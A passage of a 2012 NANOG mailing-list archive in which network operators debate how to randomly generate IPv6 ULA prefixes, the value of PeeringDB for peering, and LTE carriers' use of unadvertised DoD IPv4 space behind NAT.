-- ++ytti From mike at mtcc.com Wed Jul 18 09:26:25 2012 From: mike at mtcc.com (Michael Thomas) Date: Wed, 18 Jul 2012 07:26:25 -0700 Subject: using "reserved" IPv6 space In-Reply-To: <34110.1342617033@turing-police.cc.vt.edu> References: <500032E4.40804@gmail.com> <5005E562.8060206@rollernet.us> <5005E87D.6060006@unfix.org> <20120718070405.GA10591@pob.ytti.fi> <34110.1342617033@turing-police.cc.vt.edu> Message-ID: <5006C791.90200@mtcc.com> On 07/18/2012 06:10 AM, valdis.kletnieks at vt.edu wrote: > On Wed, 18 Jul 2012 10:04:05 +0300, Saku Ytti said: > >> However I'm not sure what would be good seed? ISO3166 alpha2 + >> domestic_business_id + 0..n (for nth block you needed) > You want to roll in at some entropy by adding in the current date or > something, so two "Joes' Burritos and Internet" in 2 different states don't > generate the same value. There's a reason that 4193 recommends > a 64bit timestamp and an EUI64. > ulamart.com is available for the enterprising amongst us... Mike From cgrundemann at gmail.com Wed Jul 18 10:43:32 2012 From: cgrundemann at gmail.com (Chris Grundemann) Date: Wed, 18 Jul 2012 09:43:32 -0600 Subject: Why use PeeringDB? Message-ID: Peering Experts, I am currently working on a BCOP for IPv6 Peering and Transit and would very much appreciate some expert information on why using PeeringDB is a best practice (or why its not). All opinions are welcome, but be aware that I plan on using the responses to enhance the document, which will be made publicly available as one of several (and hopefully many more) BCOPs published at http://www.ipbcop.org/. Also, if there are those among you who would like to review the entire document and perhaps volunteer as a SME to help expand and polish it, please contact me off-list and I'll get you a current draft. Thanks in advance. Cheers, ~Chris -- @ChrisGrundemann http://chrisgrundemann.com From djahandarie at gmail.com Wed Jul 18 10:55:41 2012 From: djahandarie at gmail.com (Darius Jahandarie) Date: Wed, 18 Jul 2012 11:55:41 -0400 Subject: Why use PeeringDB? In-Reply-To: References: Message-ID: On Wed, Jul 18, 2012 at 11:43 AM, Chris Grundemann wrote: > I am currently working on a BCOP for IPv6 Peering and Transit and > would very much appreciate some expert information on why using > PeeringDB is a best practice (or why its not). All opinions are > welcome, but be aware that I plan on using the responses to enhance > the document, which will be made publicly available as one of several > (and hopefully many more) BCOPs published at http://www.ipbcop.org/. Well, PeeringDB is basically the first stop for anyone who wants to potentially peer with you, or has received a peering request from you. (Some people even scrape the database to find potential peers based on traffic levels and existing peering locations.) A database of easy-to-access contact information, internet exchanges, and facilities is a boon to even non-peering tasks, such as finding a noc email. Basically, if you have a clue and want to peer, or even just be a good netizen, having and maintaining an up-to-date PeeringDB entry is a good idea. Simple as that. -- Darius Jahandarie From jof at thejof.com Wed Jul 18 10:56:44 2012 From: jof at thejof.com (Jonathan Lassoff) Date: Wed, 18 Jul 2012 08:56:44 -0700 Subject: Why use PeeringDB? In-Reply-To: References: Message-ID: On Wed, Jul 18, 2012 at 8:43 AM, Chris Grundemann wrote: > I am currently working on a BCOP for IPv6 Peering and Transit and > would very much appreciate some expert information on why using > PeeringDB is a best practice (or why its not). All opinions are > welcome, but be aware that I plan on using the responses to enhance > the document, which will be made publicly available as one of several > (and hopefully many more) BCOPs published at http://www.ipbcop.org/. It's a nice resource for finding out which networks are in which facilities. As someone seeking out and setting up peering sessions, it's useful to be able to search out networks that also have a couple common POPs, so that one can call or email them and ask about potential interconnection. It's certain cut down on emails that are just requests for information ("Where do you have sites? We're in these metros...", "Looks like we'd be good potential peers, what's your policy like?"). Overall -- I really like it! Cheers, jof From owen at delong.com Wed Jul 18 11:10:52 2012 From: owen at delong.com (Owen DeLong) Date: Wed, 18 Jul 2012 11:10:52 -0500 Subject: using "reserved" IPv6 space In-Reply-To: <20120718134800.GA11320@pob.ytti.fi> References: <500032E4.40804@gmail.com> <5005E562.8060206@rollernet.us> <5005E87D.6060006@unfix.org> <20120718070405.GA10591@pob.ytti.fi> <5006BC04.1000306@sprunk.org> <20120718134800.GA11320@pob.ytti.fi> Message-ID: <5DFFC836-6A5B-4185-9873-4449E3784497@delong.com> Sent from my iPad On Jul 18, 2012, at 8:48 AM, Saku Ytti wrote: > On (2012-07-18 08:37 -0500), Stephen Sprunk wrote: > >>> it should bepossible to incorporate RFC2777 verifiability to it. >> >> There is no need for that, since your failure to use a good source of >> randomness hurts nobody except yourself. > > I think you're making fact out of opinion. Maybe SP is generating ULAs for > their customers. Maybe they'd like to be able to prove in case of dispute > that other customer with memorable ULA was not favoured. > Maybe someone claims I'm not using BCP methods for ULA selection, and I'd > like to be able to falsify those claims. > SP should never do that. SP should provide GUA. ULA should be local to the customer and not used between customers unless the customers specifically agree to do so. In that case, the customers can handle the coordination and there is no need for the SP to be involved in any dispute. Owen From stephen at sprunk.org Wed Jul 18 11:39:34 2012 From: stephen at sprunk.org (Stephen Sprunk) Date: Wed, 18 Jul 2012 11:39:34 -0500 Subject: using "reserved" IPv6 space In-Reply-To: <20120718134800.GA11320@pob.ytti.fi> References: <500032E4.40804@gmail.com> <5005E562.8060206@rollernet.us> <5005E87D.6060006@unfix.org> <20120718070405.GA10591@pob.ytti.fi> <5006BC04.1000306@sprunk.org> <20120718134800.GA11320@pob.ytti.fi> Message-ID: <5006E6C6.20807@sprunk.org> On 18-Jul-12 08:48, Saku Ytti wrote: > On (2012-07-18 08:37 -0500), Stephen Sprunk wrote: >> There is no need for [RFC2777 verifiability], since your failure to use a good source of randomness hurts nobody except yourself. > > I think you're making fact out of opinion. Maybe SP is generating ULAs for their customers. Why would they do that? SPs should only be assigning (and routing) GUAs. ULAs are for /local/ use within the customer site, so customers can and should generate their own locally. An SP should never see those addresses and can safely ignore their existence, aside from a generic filter on the entire ULA range. > Maybe this is not practical enough concern, but I'm wondering, what is the downside? What is the benefit of recommending method which is not > testable/provable. Those were not considered requirements for the algorithm in RFC 4193 since there is no scenario /where RFC 4193 addresses are a valid solution in the first place/ for which testability or provability of the algorithm's results are important or even useful. S -- Stephen Sprunk "God does not play dice." --Albert Einstein CCIE #3723 "God is an inveterate gambler, and He throws the K5SSS dice at every possible opportunity." --Stephen Hawking -------------- next part -------------- A non-text attachment was scrubbed... Name: smime.p7s Type: application/pkcs7-signature Size: 2312 bytes Desc: S/MIME Cryptographic Signature URL: From zaid at zaidali.com Wed Jul 18 11:59:01 2012 From: zaid at zaidali.com (Zaid Ali) Date: Wed, 18 Jul 2012 09:59:01 -0700 Subject: Why use PeeringDB? In-Reply-To: Message-ID: The goal is "Source of truth" for any peer to know information at the Exchange points as well as peering coordinator information. I think it is a great tool for the peering community and definitely useful. Cons: Will it be the next RADB? There needs to be a sustainable community to keep it running since it is a volunteer effort. Zaid On 7/18/12 8:43 AM, "Chris Grundemann" wrote: >Peering Experts, > >I am currently working on a BCOP for IPv6 Peering and Transit and >would very much appreciate some expert information on why using >PeeringDB is a best practice (or why its not). All opinions are >welcome, but be aware that I plan on using the responses to enhance >the document, which will be made publicly available as one of several >(and hopefully many more) BCOPs published at http://www.ipbcop.org/. > >Also, if there are those among you who would like to review the entire >document and perhaps volunteer as a SME to help expand and polish it, >please contact me off-list and I'll get you a current draft. > >Thanks in advance. > >Cheers, >~Chris > >-- >@ChrisGrundemann >http://chrisgrundemann.com > From jof at thejof.com Wed Jul 18 12:24:21 2012 From: jof at thejof.com (Jonathan Lassoff) Date: Wed, 18 Jul 2012 10:24:21 -0700 Subject: Why use PeeringDB? In-Reply-To: References: Message-ID: On Wed, Jul 18, 2012 at 9:59 AM, Zaid Ali wrote: > The goal is "Source of truth" for any peer to know information at the > Exchange points as well as peering coordinator information. I think it is > a great tool for the peering community and definitely useful. Cons: Will > it be the next RADB? There needs to be a sustainable community to keep it > running since it is a volunteer effort. Good point. I suspect that enough large users (with money, developers, hosting, etc.) are enjoying it that it has reached a critical mass of a semi-core service that wont have a hard time getting some support going forward. --j From djahandarie at gmail.com Wed Jul 18 12:47:28 2012 From: djahandarie at gmail.com (Darius Jahandarie) Date: Wed, 18 Jul 2012 13:47:28 -0400 Subject: Why use PeeringDB? In-Reply-To: References: Message-ID: On Wed, Jul 18, 2012 at 1:24 PM, Jonathan Lassoff wrote: > Good point. I suspect that enough large users (with money, developers, > hosting, etc.) are enjoying it that it has reached a critical mass of > a semi-core service that wont have a hard time getting some support > going forward. At the moment, I think there are 10-15 volunteers that help handle tickets and such, then 3-4 volunteers that help run the hardware/software. There seems to be good coverage for everything needed, as far as I can tell :). -- Darius Jahandarie From saku at ytti.fi Wed Jul 18 13:07:35 2012 From: saku at ytti.fi (Saku Ytti) Date: Wed, 18 Jul 2012 21:07:35 +0300 Subject: using "reserved" IPv6 space In-Reply-To: <5006E6C6.20807@sprunk.org> References: <500032E4.40804@gmail.com> <5005E562.8060206@rollernet.us> <5005E87D.6060006@unfix.org> <20120718070405.GA10591@pob.ytti.fi> <5006BC04.1000306@sprunk.org> <20120718134800.GA11320@pob.ytti.fi> <5006E6C6.20807@sprunk.org> Message-ID: <20120718180735.GA11403@pob.ytti.fi> On (2012-07-18 11:39 -0500), Stephen Sprunk wrote: > On 18-Jul-12 08:48, Saku Ytti wrote: > Why would they do that? SPs should only be assigning (and routing) GUAs. Because SP might be tasked to provide network plan for customers L3 MPLS VPN and customer might get INET from different SP and might not want those to be used for L3 MPLS VPN. > ULAs are for /local/ use within the customer site, so customers can and > should generate their own locally. An SP should never see those You make assumption that customer does not buy everything as service. RFC1918 is local, yet often IP plan comes as a service from someone who does it for many companies. > Those were not considered requirements for the algorithm in RFC 4193 > since there is no scenario /where RFC 4193 addresses are a valid > solution in the first place/ for which testability or provability of the > algorithm's results are important or even useful. If collision occurs, if dispute occurs, provability that one party did not use BCP method can be useful to solve dispute and decide who renumbers. Other potential problem with RFC, if you have software to generate two, if software runs parallel, it may generate same prefixes. IEEE decided 2008 or 2009 to start allocation OUIs randomly, since some cheapskates were assigning themselves 'free' OUIs from end of the space, confident it'll never collide. So duplicate OUIs can happen. Also some NIC vendors ship with non-unique MAC. What makes RFC method good? Would provability make it worse? Would simply drawing 40b of random from known implementation (openssl?) be worse or better? Random as generated by some known/common implementation wouldn't suffer risk of collisions as described above. -- ++ytti From marka at isc.org Wed Jul 18 19:25:48 2012 From: marka at isc.org (Mark Andrews) Date: Thu, 19 Jul 2012 10:25:48 +1000 Subject: using "reserved" IPv6 space In-Reply-To: Your message of "Wed, 18 Jul 2012 21:07:35 +0300." <20120718180735.GA11403@pob.ytti.fi> References: <500032E4.40804@gmail.com> <5005E562.8060206@rollernet.us> <5005E87D.6060006@unfix.org> <20120718070405.GA10591@pob.ytti.fi> <5006BC04.1000306@sprunk.org> <20120718134800.GA11320@pob.ytti.fi> <5006E6C6.20807@sprunk.org> <20120718180735.GA11403@pob.ytti.fi> Message-ID: <20120719002548.C779D22AE4EE@drugs.dv.isc.org> In message <20120718180735.GA11403 at pob.ytti.fi>, Saku Ytti writes: > On (2012-07-18 11:39 -0500), Stephen Sprunk wrote: > > On 18-Jul-12 08:48, Saku Ytti wrote: > > > Why would they do that? SPs should only be assigning (and routing) GUAs. > > Because SP might be tasked to provide network plan for customers L3 MPLS > VPN and customer might get INET from different SP and might not want those > to be used for L3 MPLS VPN. > > > ULAs are for /local/ use within the customer site, so customers can and > > should generate their own locally. An SP should never see those > > You make assumption that customer does not buy everything as service. > RFC1918 is local, yet often IP plan comes as a service from someone who > does it for many companies. > > > Those were not considered requirements for the algorithm in RFC 4193 > > since there is no scenario /where RFC 4193 addresses are a valid > > solution in the first place/ for which testability or provability of the > > algorithm's results are important or even useful. > > If collision occurs, if dispute occurs, provability that one party did not > use BCP method can be useful to solve dispute and decide who renumbers. > Other potential problem with RFC, if you have software to generate two, if > software runs parallel, it may generate same prefixes. > IEEE decided 2008 or 2009 to start allocation OUIs randomly, since some > cheapskates were assigning themselves 'free' OUIs from end of the space, > confident it'll never collide. So duplicate OUIs can happen. Also some NIC > vendors ship with non-unique MAC. > > What makes RFC method good? Would provability make it worse? Would simply > drawing 40b of random from known implementation (openssl?) be worse or > better? Random as generated by some known/common implementation wouldn't > suffer risk of collisions as described above. > > -- > ++ytti The point of the algorithm was to have something which would do a reasonable job in a CPE router without a hardware source of randomness. CPE devices have access to a EUI-64/EUI-48 and often have ntp support or a way of setting the current time. Combining the two gives enough uniqueness. Just the EUI-64/EUI-48 should be enough but duplicates have been known to occur so adding in a timestamp accounts for that rare case. It is a "SAMPLE" routinue. It is not "YOU MUST DO IT THIS WAY OR ELSE". Anything that meets the requirements of RFC 4086 is fine. /dev/random on by laptop meets the requirements of RFC 4086. I read 40 bits from /dev/random and converted them hex them appended them to fd to produce my prefix. dd bs=5 count=1 if=/dev/random | od -txC | \ awk 'NF == 6 {print "fd" $2 ":" $3 $4 ":" $5 $6}' and a sample of prefixes generated this way: fd3d:6385:e4b3 fdf8:462a:6474 fd7b:2bdf:7ed6 fd75:b2b0:9ba2 fd04:4c74:87c0 fd77:948a:2c39 fde5:41f9:95f6 fd00:74a5:e5ad fd36:827f:ee5f fd39:d806:5994 fd23:d147:8ff9 fd36:a032:8a09 fde8:6992:d8f9 There is no "I used this method so I win". As long as you choose a random value, using a method that uniformly covers the entire space, you meet the requirements. Toss a coin for each bit. Heads = 1, tails = 0. Mark -- Mark Andrews, ISC 1 Seymour St., Dundas Valley, NSW 2117, Australia PHONE: +61 2 9871 4742 INTERNET: marka at isc.org From khomyakov.andrey at gmail.com Wed Jul 18 20:24:00 2012 From: khomyakov.andrey at gmail.com (Andrey Khomyakov) Date: Wed, 18 Jul 2012 21:24:00 -0400 Subject: Another LTE network turns up as IPv4-only squat space + NAT In-Reply-To: References: Message-ID: So some "comments" on the intertubes claim that DoD ok'd use of it's unadvertized space on private networks. Is there any official reference that may support this statement that anyone of you have seen out there? --Andrey From trejrco at gmail.com Wed Jul 18 20:35:59 2012 From: trejrco at gmail.com (TJ) Date: Wed, 18 Jul 2012 21:35:59 -0400 Subject: Another LTE network turns up as IPv4-only squat space + NAT In-Reply-To: References: Message-ID: Even if they did OK it (which i doubt), actually using it - especially in a public/customer facing / visible deployment - is a Bad Idea. *Traceability fail and possibly creating unreachable networks out there ...* /TJ On Wed, Jul 18, 2012 at 9:24 PM, Andrey Khomyakov < khomyakov.andrey at gmail.com> wrote: > So some "comments" on the intertubes claim that DoD ok'd use of it's > unadvertized space on private networks. Is there any official reference > that may support this statement that anyone of you have seen out there? > > --Andrey > From shortdudey123 at gmail.com Wed Jul 18 20:52:22 2012 From: shortdudey123 at gmail.com (Grant Ridder) Date: Wed, 18 Jul 2012 20:52:22 -0500 Subject: Another LTE network turns up as IPv4-only squat space + NAT In-Reply-To: References: Message-ID: I am on sprint and my ip is always in the 20. net even though my wan up is totally different. Grant On Wednesday, July 18, 2012, TJ wrote: > Even if they did OK it (which i doubt), actually using it - especially in a > public/customer facing / visible deployment - is a Bad Idea. > *Traceability fail and possibly creating unreachable networks out there > ...* > > /TJ > > > On Wed, Jul 18, 2012 at 9:24 PM, Andrey Khomyakov < > khomyakov.andrey at gmail.com > wrote: > > > So some "comments" on the intertubes claim that DoD ok'd use of it's > > unadvertized space on private networks. Is there any official reference > > that may support this statement that anyone of you have seen out there? > > > > --Andrey > > > From chuckchurch at gmail.com Wed Jul 18 21:36:31 2012 From: chuckchurch at gmail.com (Chuck Church) Date: Wed, 18 Jul 2012 22:36:31 -0400 Subject: Another LTE network turns up as IPv4-only squat space + NAT In-Reply-To: References: Message-ID: <009801cd6557$503c6d70$f0b54850$@gmail.com> I disagree. I see it as an extra layer of security. If DOD had a network with address space 'X', obviously it's not advertised to the outside. It never interacts with public network. Having it duplicated on the outside world adds an extra layer of complexity to a hacker trying to access it. It's not a be-all/end-all, but it's a plus. A hacker who's partially in the network may try to access network 'X', but it routes to the outside world, tripping IDSs... Chuck -----Original Message----- From: TJ [mailto:trejrco at gmail.com] Sent: Wednesday, July 18, 2012 9:36 PM To: Andrey Khomyakov Cc: Nanog Subject: Re: Another LTE network turns up as IPv4-only squat space + NAT Even if they did OK it (which i doubt), actually using it - especially in a public/customer facing / visible deployment - is a Bad Idea. *Traceability fail and possibly creating unreachable networks out there ...* /TJ On Wed, Jul 18, 2012 at 9:24 PM, Andrey Khomyakov < khomyakov.andrey at gmail.com> wrote: > So some "comments" on the intertubes claim that DoD ok'd use of it's > unadvertized space on private networks. Is there any official > reference that may support this statement that anyone of you have seen out there? > > --Andrey > From ospfisisis at gmail.com Wed Jul 18 21:41:22 2012 From: ospfisisis at gmail.com (Mark Wall) Date: Wed, 18 Jul 2012 22:41:22 -0400 Subject: Clued contact at Brighthouse Message-ID: Anyone have a way to contact brighthouse network that doesn't end up in residential support? Thanks folks From mysidia at gmail.com Wed Jul 18 22:00:43 2012 From: mysidia at gmail.com (Jimmy Hess) Date: Wed, 18 Jul 2012 22:00:43 -0500 Subject: using "reserved" IPv6 space In-Reply-To: <20120719002548.C779D22AE4EE@drugs.dv.isc.org> References: <500032E4.40804@gmail.com> <5005E562.8060206@rollernet.us> <5005E87D.6060006@unfix.org> <20120718070405.GA10591@pob.ytti.fi> <5006BC04.1000306@sprunk.org> <20120718134800.GA11320@pob.ytti.fi> <5006E6C6.20807@sprunk.org> <20120718180735.GA11403@pob.ytti.fi> <20120719002548.C779D22AE4EE@drugs.dv.isc.org> Message-ID: On 7/18/12, Mark Andrews wrote: [snip] > space, you meet the requirements. Toss a coin for each bit. Heads > = 1, tails = 0. Sure... and if someone says they just happened to toss a coin 128 times, and got "0" all 128 times, therefore legitimately assigned ULA ID is all zeros, I don't believe them. (1 / 2)^128 * ([128 : 128]) for ? = 0.0000000002 H_0: fair coin Observation: 128 heads out of 128 flips (or 128 tails out of 128 flips) For H_0, Prob given >= 128 heads or >= tails = 2*(1 - Prob(<128) ) = < 0.000000000000000000000000000000000006% Reject H_0. Perhaps the world would be well served if the RFC called for routers to apply some [very lenient] randomness tests to the sequence of bits proposed to be configured as a ULA ID.... :) -- -JH From kauer at biplane.com.au Wed Jul 18 22:57:52 2012 From: kauer at biplane.com.au (Karl Auer) Date: Thu, 19 Jul 2012 13:57:52 +1000 Subject: using "reserved" IPv6 space In-Reply-To: References: <500032E4.40804@gmail.com> <5005E562.8060206@rollernet.us> <5005E87D.6060006@unfix.org> <20120718070405.GA10591@pob.ytti.fi> <5006BC04.1000306@sprunk.org> <20120718134800.GA11320@pob.ytti.fi> <5006E6C6.20807@sprunk.org> <20120718180735.GA11403@pob.ytti.fi> <20120719002548.C779D22AE4EE@drugs.dv.isc.org> Message-ID: <1342670272.6281.646.camel@karl> On Wed, 2012-07-18 at 22:00 -0500, Jimmy Hess wrote: > Sure... and if someone says they just happened to toss a coin 128 > times, and got "0" all 128 times, therefore legitimately assigned ULA > ID is all zeros, I don't believe them. Um - 40 times, not 128. The first 8 are set, the last 80 are yours to do with as you please, and the remaining 40 should be random. BUT: The whole idea of ULA is that it is for internal use only. If you want to use 00:0000:0000 as your 40 bits, go for it. Just be aware that you expose yourself to the risk of pain if, somewhere down the track, you need to merge your network with someone else who cleverly chose 00:0000:0000 as well. You can't stop people being making that choice and taking that risk. You can, however, protect *yourself* by choosing something that is genuinely random and thus minimising the chance that, come the day when you have to merge your network with another (including with someone who chose non-randomly), you will be able to do so relatively painlessly. I don't understand the professed need for provable randomness. Without a number *space* to provide context, randomness is inherently non-provable. The whole point of the randomness of those 40 bits of ULA infix is that any number is as likely as any other number. Someone, somewhere, is eventually going to get 10:0000:0000, someone else will eventually get 20:0000:0000 and so on. And they are just as likely to get them now as in ten years time. Because of the likelihood that many people will opt for immediate convenience at the cost of one-day-maybe-never pain, I would suggest that you avoid ULA prefixes that *look* non-random to the naked eye. So if your RNG thows up 00:0000:0001, run it again :-) Regards, K. -- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Karl Auer (kauer at biplane.com.au) http://www.biplane.com.au/kauer GPG fingerprint: AE1D 4868 6420 AD9A A698 5251 1699 7B78 4EEE 6017 Old fingerprint: DA41 51B1 1481 16E1 F7E2 B2E9 3007 14ED 5736 F687 -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 230 bytes Desc: This is a digitally signed message part URL: From marka at isc.org Wed Jul 18 23:17:50 2012 From: marka at isc.org (Mark Andrews) Date: Thu, 19 Jul 2012 14:17:50 +1000 Subject: using "reserved" IPv6 space In-Reply-To: Your message of "Wed, 18 Jul 2012 22:00:43 EST." References: <500032E4.40804@gmail.com> <5005E562.8060206@rollernet.us> <5005E87D.6060006@unfix.org> <20120718070405.GA10591@pob.ytti.fi> <5006BC04.1000306@sprunk.org> <20120718134800.GA11320@pob.ytti.fi> <5006E6C6.20807@sprunk.org> <20120718180735.GA11403@pob.ytti.fi> <20120719002548.C779D22AE4EE@drugs.dv.isc.org> Message-ID: <20120719041750.D30FF22B5846@drugs.dv.isc.org> In message , Jimmy Hess writes: > On 7/18/12, Mark Andrews wrote: > [snip] > > space, you meet the requirements. Toss a coin for each bit. Heads > > =3D 1, tails =3D 0. > Sure... and if someone says they just happened to toss a coin 128 > times, and got "0" all 128 times, therefore legitimately assigned ULA > ID is all zeros, I don't believe them. Given it is 40 bits not 128 bits the chance of getting all zero/all ones is < 0.000000000001%. > (1 / 2)^128 * ([128 : 128]) > > for =E1 =3D 0.0000000002 > H_0: fair coin > Observation: 128 heads out of 128 flips (or 128 tails out of 128 flips) > > For H_0, Prob given >=3D 128 heads or >=3D tails =3D 2*(1 - Prob(<1= > 28) ) =3D > < 0.000000000000000000000000000000000006% > > Reject H_0. > > > Perhaps the world would be well served if the RFC called for routers to app= > ly > some [very lenient] randomness tests to the sequence of bits proposed > to be configured as a ULA ID.... :) Given there is no such possible test I fail to see how you could expect anyone to implement it. You can't examine a single value to determine if it was randomally choosen or not. Even with multiple values you can't determine if there were randomally or systematically choosen as there are a inifinite number of systems that will produce a randomally choosen sequence. Mark -- Mark Andrews, ISC 1 Seymour St., Dundas Valley, NSW 2117, Australia PHONE: +61 2 9871 4742 INTERNET: marka at isc.org From mysidia at gmail.com Wed Jul 18 23:40:30 2012 From: mysidia at gmail.com (Jimmy Hess) Date: Wed, 18 Jul 2012 23:40:30 -0500 Subject: using "reserved" IPv6 space In-Reply-To: <1342670272.6281.646.camel@karl> References: <500032E4.40804@gmail.com> <5005E562.8060206@rollernet.us> <5005E87D.6060006@unfix.org> <20120718070405.GA10591@pob.ytti.fi> <5006BC04.1000306@sprunk.org> <20120718134800.GA11320@pob.ytti.fi> <5006E6C6.20807@sprunk.org> <20120718180735.GA11403@pob.ytti.fi> <20120719002548.C779D22AE4EE@drugs.dv.isc.org> <1342670272.6281.646.camel@karl> Message-ID: On 7/18/12, Karl Auer wrote: > I don't understand the professed need for provable randomness. Without a > number *space* to provide context, randomness is inherently > non-provable. The whole point of the randomness of those 40 bits of ULA > infix is that any number is as likely as any other number. Someone, When numbers are selected by choosing a random value; certain ratios of bits set to "1" are more likely to occur than other ratios of bits set to "1". A random generator that is operating correctly, is much more likely to emit a number with 50% of the bits set to 1, than it is to emit a number with 0% of the bits set to 1, given a sufficient number of bits. If the ratio is inconsistent by a sufficient margin, and your sample of the bits is large enough in number, you can show with high confidence that the number is not random; a 1 in 10 billion chance of the number being randomly generated, would be pretty convincing, for example. Removing the temptation by excluding the small number of choices with 90% - 95% of the bits set to 1 may eliminate future problems caused by an early "accident"/"error" in assigning the initial ULA, compared to the minor inconvenience of needing to run the ULA generator one more time to get an actual usable range. > somewhere, is eventually going to get 10:0000:0000, someone else will > eventually get 20:0000:0000 and so on. And they are just as likely to > get them now as in ten years time. That is extremely improbable. If you generate a million ULA IDs a day, every day, it is expected to be over 1000 years before you generate one of those two. -- -JH From kauer at biplane.com.au Thu Jul 19 00:16:33 2012 From: kauer at biplane.com.au (Karl Auer) Date: Thu, 19 Jul 2012 15:16:33 +1000 Subject: using "reserved" IPv6 space In-Reply-To: References: <500032E4.40804@gmail.com> <5005E562.8060206@rollernet.us> <5005E87D.6060006@unfix.org> <20120718070405.GA10591@pob.ytti.fi> <5006BC04.1000306@sprunk.org> <20120718134800.GA11320@pob.ytti.fi> <5006E6C6.20807@sprunk.org> <20120718180735.GA11403@pob.ytti.fi> <20120719002548.C779D22AE4EE@drugs.dv.isc.org> <1342670272.6281.646.camel@karl> Message-ID: <1342674993.6281.674.camel@karl> On Wed, 2012-07-18 at 23:40 -0500, Jimmy Hess wrote: > When numbers are selected by choosing a random value; certain ratios > of bits set to "1" are more likely to occur than other ratios of bits > set to "1". True. But you cannot tell, from a sample of one number, whether that number was chosen randomly. You can only test it statistically within a series. A particular number may be random in one sequence, non-random in another. > > somewhere, is eventually going to get 10:0000:0000 > That is extremely improbable. Yes. It's just exactly as improbable as *any other prefix* thrown up by your favourite RNG. > If you generate a million ULA IDs a day, every day, it is expected to > be over 1000 years before you generate one of those two. The same is true of *every prefix generated*, yet amazingly, people are generating new, unique random prefixes every day, and each and every one of them was just as improbable. Fancy that! It might be that long before you *expect* to see one, but that doesn't mean you will definitely have to wait that long. It could come along tomorrow. That's what "random" means. Let people choose and use whatever ULA prefixes they like. That is the *point* of ULA. If they choose poorly, then they choose poorly - it's no skin off anyone's nose but theirs. If *I* have to choose, I will choose a random prefix, so that in the unlikely event that I have to deal with them, my pain will be minimised. But the best way to win is not to play the game - use PI address space instead of ULA. Regards, K. -- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Karl Auer (kauer at biplane.com.au) http://www.biplane.com.au/kauer GPG fingerprint: AE1D 4868 6420 AD9A A698 5251 1699 7B78 4EEE 6017 Old fingerprint: DA41 51B1 1481 16E1 F7E2 B2E9 3007 14ED 5736 F687 -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 230 bytes Desc: This is a digitally signed message part URL: From saku at ytti.fi Thu Jul 19 02:28:41 2012 From: saku at ytti.fi (Saku Ytti) Date: Thu, 19 Jul 2012 10:28:41 +0300 Subject: using "reserved" IPv6 space In-Reply-To: <20120719002548.C779D22AE4EE@drugs.dv.isc.org> References: <500032E4.40804@gmail.com> <5005E562.8060206@rollernet.us> <5005E87D.6060006@unfix.org> <20120718070405.GA10591@pob.ytti.fi> <5006BC04.1000306@sprunk.org> <20120718134800.GA11320@pob.ytti.fi> <5006E6C6.20807@sprunk.org> <20120718180735.GA11403@pob.ytti.fi> <20120719002548.C779D22AE4EE@drugs.dv.isc.org> Message-ID: <20120719072841.GA11726@pob.ytti.fi> On (2012-07-19 10:25 +1000), Mark Andrews wrote: > The point of the algorithm was to have something which would do a > reasonable job in a CPE router without a hardware source of randomness. In that context it very much makes sense. > It is a "SAMPLE" routinue. It is not "YOU MUST DO IT THIS WAY OR > ELSE". Anything that meets the requirements of RFC 4086 is fine. > /dev/random on by laptop meets the requirements of RFC 4086. I Good to know, earlier in this thread, when fully 40b random (method I've been also using, which I've always thought to be superior to RFC) was suggested, it was met with cold shoulder 'does not follow RFC4086 ... do not use'. I guess I'll keep on using my 40b random instead of 'exactly RFC', and keep verifiability in wish-list. -- ++ytti From saku at ytti.fi Thu Jul 19 02:33:50 2012 From: saku at ytti.fi (Saku Ytti) Date: Thu, 19 Jul 2012 10:33:50 +0300 Subject: using "reserved" IPv6 space In-Reply-To: <1342674993.6281.674.camel@karl> References: <20120718070405.GA10591@pob.ytti.fi> <5006BC04.1000306@sprunk.org> <20120718134800.GA11320@pob.ytti.fi> <5006E6C6.20807@sprunk.org> <20120718180735.GA11403@pob.ytti.fi> <20120719002548.C779D22AE4EE@drugs.dv.isc.org> <1342670272.6281.646.camel@karl> <1342674993.6281.674.camel@karl> Message-ID: <20120719073350.GB11726@pob.ytti.fi> On (2012-07-19 15:16 +1000), Karl Auer wrote: > True. But you cannot tell, from a sample of one number, whether that > number was chosen randomly. You can only test it statistically within a > series. A particular number may be random in one sequence, non-random in > another. RFC2777 deals with this problem to a degree. If you define algorithm and define how to choose seed, then you can later verify that this particular algorithm was used to generate the number. -- ++ytti From mansaxel at besserwisser.org Thu Jul 19 03:50:02 2012 From: mansaxel at besserwisser.org (=?utf-8?B?TcOlbnM=?= Nilsson) Date: Thu, 19 Jul 2012 10:50:02 +0200 Subject: Another LTE network turns up as IPv4-only squat space + NAT In-Reply-To: <009801cd6557$503c6d70$f0b54850$@gmail.com> References: <009801cd6557$503c6d70$f0b54850$@gmail.com> Message-ID: <20120719085002.GI20473@besserwisser.org> Subject: RE: Another LTE network turns up as IPv4-only squat space + NAT Date: Wed, Jul 18, 2012 at 10:36:31PM -0400 Quoting Chuck Church (chuckchurch at gmail.com): > I disagree. I see it as an extra layer of security. If DOD had a network > with address space 'X', obviously it's not advertised to the outside. It > never interacts with public network. Having it duplicated on the outside > world adds an extra layer of complexity to a hacker trying to access it. > It's not a be-all/end-all, but it's a plus. A hacker who's partially in the > network may try to access network 'X', but it routes to the outside world, > tripping IDSs... Then DoD should go for using something like the v6 documentation prefix or similar. It both is in many peoples filters and (as referenced here recently) is being used for stuff that "never" (promise! or at least not until we change our minds) is going to need connectivity. I do not see DoD handing back its allocations in the name of promoting unreachability by swapping it for reusable space.. It probably values the uniqueness property of allocated space too much. And rightly so. No, reusing somebody's prefix is A Very Bad Idea. I'm having a very hard time believing the alleged "ok" is anything but cheap talk. -- M?ns Nilsson primary/secondary/besserwisser/machina MN-1334-RIPE +46 705 989668 The Osmonds! You are all Osmonds!! Throwing up on a freeway at dawn!!! -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 198 bytes Desc: Digital signature URL: From bmanning at vacation.karoshi.com Thu Jul 19 04:41:59 2012 From: bmanning at vacation.karoshi.com (bmanning at vacation.karoshi.com) Date: Thu, 19 Jul 2012 09:41:59 +0000 Subject: Another LTE network turns up as IPv4-only squat space + NAT 